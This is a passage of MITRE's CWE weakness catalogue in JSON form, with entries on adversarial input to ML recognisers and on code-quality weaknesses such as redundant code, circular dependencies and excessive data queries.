assumption.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"435","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary","Description":"This weakness does not depend on other weaknesses and is the result of choices made during optimization."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"Optimizations built into the design of a product can have unintended consequences during execution."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Alter Execution Logic","Note":"The optimizations alter the order of execution resulting in side effects that were not intended by the original developer."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-03-07"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1039":{"attr":{"@_ID":"1039","@_Name":"Automated Recognition Mechanism with Inadequate Detection or Handling of Adversarial Input Perturbations","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses an automated mechanism such as machine learning to recognize complex data inputs (e.g. image or audio) as a particular concept or category, but it does not properly detect or handle inputs that have been modified or constructed in a way that causes the mechanism to detect a different, incorrect concept.","Extended_Description":{"xhtml:p":["When techniques such as machine learning are used to automatically classify input streams, and those classifications are used for security-critical decisions, then any mistake in classification can introduce a vulnerability that allows attackers to cause the product to make the wrong security decision.  If the automated mechanism is not developed or \\"trained\\" with enough input data, then attackers may be able to craft malicious input that intentionally triggers the incorrect classification.","Targeted technologies include, but are not necessarily limited to:","For example, an attacker might modify road signs or road surface markings to trick autonomous vehicles into misreading the sign/marking and performing a dangerous action."],"xhtml:ul":{"xhtml:li":["automated speech recognition","automated image recognition"]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary","Description":"This weakness does not depend on other weaknesses and is the result of choices made during optimization."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"This issue can be introduced into the automated algorithm itself."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Bypass Protection Mechanism","Note":"When the automated recognition is used in a protection mechanism, an attacker may be able to craft inputs that are misinterpreted in a way that grants excess privileges."}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-16"}},{"attr":{"@_External_Reference_ID":"REF-17"}},{"attr":{"@_External_Reference_ID":"REF-15"}},{"attr":{"@_External_Reference_ID":"REF-13"}},{"attr":{"@_External_Reference_ID":"REF-14"}}]},"Notes":{"Note":{"#text":"Further investigation is needed to determine if better relationships exist or if additional organizational entries need to be created.  For example, this issue might be better related to \\"recognition of input as an incorrect type,\\" which might place it as a sibling of CWE-704 (incorrect type conversion).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-03-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"1041":{"attr":{"@_ID":"1041","@_Name":"Use of Redundant Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software has multiple functions, methods, procedures, macros, etc. that\\n\\t\\t\\t\\t\\tcontain the same code.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  For example, if there are two copies of the same code, the programmer might fix a weakness in one copy while forgetting to fix the same weakness in another copy."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-19"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-19"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}}},"1042":{"attr":{"@_ID":"1042","@_Name":"Static Member Data Element outside of a Singleton Class Element","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a member element that is declared as static (but not final), in which\\n\\t\\t\\t\\t\\tits parent class element \\n\\t\\t\\t\\t\\tis not a singleton class - that is, a class element that can be used only once in\\n\\t\\t\\t\\t\\tthe \'to\' association of a Create action.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1176","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-3"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-3"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1043":{"attr":{"@_ID":"1043","@_Name":"Data Element Aggregating an Excessively Large Number of Non-Primitive Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a data element that has an excessively large\\n\\t\\t\\t\\t\\tnumber of sub-elements with non-primitive data types such as structures or aggregated objects.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"excessively large\\" may vary for each product or developer, CISQ recommends a default of 5 sub-elements."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1093","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-12"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-12"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1044":{"attr":{"@_ID":"1044","@_Name":"Architecture with Number of Horizontal Layers Outside of Expected Range","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software\'s architecture contains too many - or too few -\\n\\t\\t\\t\\t\\thorizontal layers.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"expected range\\" may vary for each product or developer, CISQ recommends a default minimum of 4 layers and maximum of 8 layers."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-9"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-9"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1045":{"attr":{"@_ID":"1045","@_Name":"Parent Class with a Virtual Destructor and a Child Class without a Virtual Destructor","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A parent class has a virtual destructor method, but the parent has a child class that does not have a virtual destructor.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably, since the child might not perform essential destruction operations.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability, such as a memory leak (CWE-401)."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-17"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-17"}},{"attr":{"@_External_Reference_ID":"REF-977"}},{"attr":{"@_External_Reference_ID":"REF-978"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1046":{"attr":{"@_ID":"1046","@_Name":"Creation of Immutable Text Using String Concatenation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software creates an immutable text string using string concatenation operations.","Extended_Description":{"xhtml:p":"When building a string via a looping feature (e.g., a FOR or WHILE loop), the use of += to append to the existing string will result in the creation of a new object with each iteration. This programming pattern can be inefficient in comparison with use of text buffer data elements. This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this could be influenced to create performance problem."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1176","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-2"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-2"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1047":{"attr":{"@_ID":"1047","@_Name":"Modules with Circular Dependencies","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains modules in which one module has references that cycle back to itself, i.e., there are circular dependencies.","Extended_Description":{"xhtml:p":["As an example, with Java, this weakness might indicate cycles between packages.","This issue makes it more difficult to maintain the software due to insufficient modularity, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-7"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-13"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-7"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-13"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1048":{"attr":{"@_ID":"1048","@_Name":"Invokable Control Element with Large Number of Outward Calls","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains callable control elements that\\n         contain an excessively large number of references to other\\n         application objects external to the context of the callable,\\n         i.e. a Fan-Out value that is excessively large.","Extended_Description":{"xhtml:p":["While the interpretation of \\"excessively large Fan-Out value\\" may vary for each product or developer, CISQ recommends a default of 5 referenced objects.","This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-4"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-4"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}}},"1049":{"attr":{"@_ID":"1049","@_Name":"Excessive Data Query Operations in a Large Data Table","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs a data query with a large number of joins\\n\\t\\t\\t\\t\\tand sub-queries on a large data table.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"large data table\\" and \\"large number of joins or sub-queries\\" may vary for each product or developer, CISQ recommends a default of 1 million rows for a \\"large\\" data table, a default minimum of 5 joins, and a default minimum of 3 sub-queries."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1176","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-4"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-4"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1050":{"attr":{"@_ID":"1050","@_Name":"Excessive Platform Resource Consumption within a Loop","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software has a loop body or loop condition that contains a control element that directly or\\n\\t\\t\\t\\t\\tindirectly consumes platform resources, e.g. messaging, sessions, locks, or file\\n\\t\\t\\t\\t\\tdescriptors.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly.  If an attacker can influence the number of iterations in the loop, then this performance problem might allow a denial of service by consuming more platform resources than intended."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-8"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-8"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1051":{"attr":{"@_ID":"1051","@_Name":"Initialization with Hard-Coded Network Resource Configuration Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software initializes data using hard-coded values that act as network resource identifiers.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably, e.g. if it runs in an environment does not use the hard-coded network resource identifiers. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-18"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-18"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"1052":{"attr":{"@_ID":"1052","@_Name":"Excessive Use of Hard-Coded Literals in Initialization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software initializes a data element using a hard-coded\\n\\t\\t\\t\\t\\tliteral that is not a simple integer or static constant element.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to modify or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-3"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-3"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1053":{"attr":{"@_ID":"1053","@_Name":"Missing Documentation for Design","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not have documentation that represents how it is designed.","Extended_Description":{"xhtml:p":"This issue can make it more difficult to understand and maintain the product. It can make it more difficult and time-consuming to detect and/or fix vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1059","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"}}},"1054":{"attr":{"@_ID":"1054","@_Name":"Invocation of a Control Element at an Unnecessarily Deep Horizontal Layer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code at one architectural layer invokes code that resides\\n\\t\\t\\t\\t\\tat a deeper layer than the adjacent layer, i.e., the invocation skips at least one\\n\\t\\t\\t\\t\\tlayer, and the invoked code is not part of a vertical utility layer that can be referenced from any horizontal layer.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-12"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-12"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1055":{"attr":{"@_ID":"1055","@_Name":"Multiple Inheritance from Concrete Classes","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a class with inheritance from more than\\n\\t\\t\\t\\t\\tone concrete class.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1093","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-2"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-2"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1056":{"attr":{"@_ID":"1056","@_Name":"Invokable Control Element with Variadic Parameters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A named-callable or method control element has a signature that\\n\\t\\t\\t\\t\\tsupports a variable (variadic) number of parameters or arguments.","Extended_Description":{"xhtml:p":["This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability.","With variadic arguments, it can be difficult or inefficient for manual analysis to be certain of which function/method is being invoked."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-8"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-8"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1057":{"attr":{"@_ID":"1057","@_Name":"Data Access Operations Outside of Expected Data Manager Component","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a dedicated, central data manager component as required by design, but it contains code that performs data-access operations that do not use this data manager.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly than intended, since the intended central data manager may have been explicitly optimized for performance or other quality characteristics.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-11"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-11"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 